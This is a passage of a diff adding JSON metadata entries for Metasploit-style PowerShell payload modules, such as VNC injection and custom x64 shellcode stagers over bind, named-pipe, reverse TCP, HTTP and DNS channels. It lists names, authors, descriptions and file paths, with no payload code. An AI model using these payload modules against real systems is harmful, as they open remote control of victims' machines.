"autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/vncinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp": { + "name": "Powershell 
Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 
16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/vncinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", 
+ "fullname": "payload/cmd/windows/powershell/vncinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/find_tag", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/vncinject/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/vncinject/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/vncinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": 
"payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": 
"payload/cmd/windows/powershell/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + 
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, 
Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + 
"targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + 
"payload_cmd/windows/powershell/vncinject/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, 
+ "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + 
"payload_cmd/windows/powershell/x64/custom/bind_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + 
"fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_http": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": 
